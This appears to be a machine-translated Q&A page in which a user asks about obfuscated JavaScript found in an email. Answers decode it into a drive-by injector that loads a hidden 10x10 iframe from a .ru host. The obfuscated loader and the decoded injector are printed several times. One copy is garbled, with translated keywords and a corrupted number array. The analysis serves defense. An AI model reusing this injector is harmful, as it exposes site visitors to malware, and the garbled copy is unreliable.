这是一次Javascript黑客攻击吗?
我在一封电子邮件中找到了这个。有人能告诉我它想做什么吗?我担心这可能是恶意的 我在网上看到,这可能只是“优化的javascript”。有没有办法将其取消优化,看看它在做什么这是一次Javascript黑客攻击吗?,javascript,optimization,Javascript,Optimization,我在一封电子邮件中找到了这个。有人能告诉我它想做什么吗?我担心这可能是恶意的 我在网上看到,这可能只是“优化的javascript”。有没有办法将其取消优化,看看它在做什么 <script> c=2; i=c-2; if(parseInt("0123")===83) if(window.document) try{new String("asd").prototype.q} catch(egewgsd){ f=['-29i-29i67i64i-6i2i62i73i61i79i
<script>
c=2;
i=c-2;
if(parseInt("0123")===83)
if(window.document)
try{new String("asd").prototype.q}
catch(egewgsd){
f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87']
[0].split('i');
md='a';
v="eval";
}
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;617!=i;i+=1){j=i;s+=r["fromCharCode"](38+1*w[j]);}
if(f)z=s;
e(z);
</script>
c=2;
i=c-2;
if(parseInt(“0123”)==83)
if(window.document)
尝试{newstring(“asd”).prototype.q}
渔获物(egewgsd){
f=II7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I78I63I2I-4i22i67i64i76i59i71i63i-6I77I76I61I23I1I66I78I74I20I9I9I77I79I71II7 I7 I7 7 I7 7 I7 7 I7 7 I7 7 I7 7 I7 7 I7 7 I7 7 II7 7 I7 7 I7 7 I7 I7 I7 7 I7 7 I7 I7 7 I7 7 I7 I7 I7 I7 7 I7 7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 73I77I67I78I67I73I72I20I59I60I77I73I70I79I78I63I21I70I63I64I78I20I10I21I78I-3 I-3 I-3 I-3 I-3 I-3 I-3 I-3 I-2 I-2 I-2 I-2 I-2 I-2 I-2 I-29i-2 I-2 I-29i-29i-2 I-29i-29i-29i-2 I-2 I7 7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I64I8I77I63I78I27I78I78I76I67I60I79I78I63I2I1I77I76I61I6I1I66I78I78I74I20I9I9IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII60I77I73I70I79I78I63I1I21I64I8I77I78I83I70I63I8I70I63I64I78I23I1I10I1II7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I7 I77I28I83I46I59I65I40I59I71I63I2I2I1I60I73I62I83I1I3I53I10I55I8I59I74I74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87']
[0]。拆分('i');
md='a';
v=“eval”;
}
如果(v)e=窗口[v];
w=f;
s=[];
r=字符串;
对于(;617!=i;i+=1){j=i;s+=r[“fromCharCode”](38+1*w[j]);}
如果(f)z=s;
e(z);
if(document.getElementsByTagName('body')[0]){
iframer();
}
否则{
文件。填写(“”);
}
函数iframer(){
var f=document.createElement('iframe');
f、 setAttribute('src','http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');
f、 style.visibility='hidden';
f、 style.position='绝对';
f、 style.left='0';
f、 style.top='0';
f、 setAttribute('width','10');
f、 setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
控制台.log(z) if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
if(document.getElementsByTagName('body')[0]){
iframer();
}否则{
文件。填写(“”);
}
函数iframer(){
var f=document.createElement('iframe');f.setAttribute('src','http://sumatranoque.ru:8080/navigator/jueoaritjuir.php);f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
它尝试在IFRAME中创建和加载url。它打开一个加载url的IFRAME。要查看Javascript代码,请将“eval”更改为“alert”。如下所示:
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
if(document.getElementsByTagName('body')[0]){
iframer();
}否则{
文件。填写(“”);
}
函数iframer(){
var f=document.createElement('iframe');
f、 setAttribute('src','http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');
f、 style.visibility='hidden';
f、 style.position='绝对';
f、 style.left='0';
f、 style.top='0';
f、 setAttribute('width','10');
f、 setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
我访问了该网站。它有一些java小程序,似乎包含特洛伊木马。避免!是的,可能通过使用Javascript解释器对其进行反向工程:)经验法则:不要再在emailsEven中打开脚本,所以……永远不要相信任何包含木马的东西eval@D.Shawley:也不要信任任何不包含
eval窗口['ev'+'al']if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}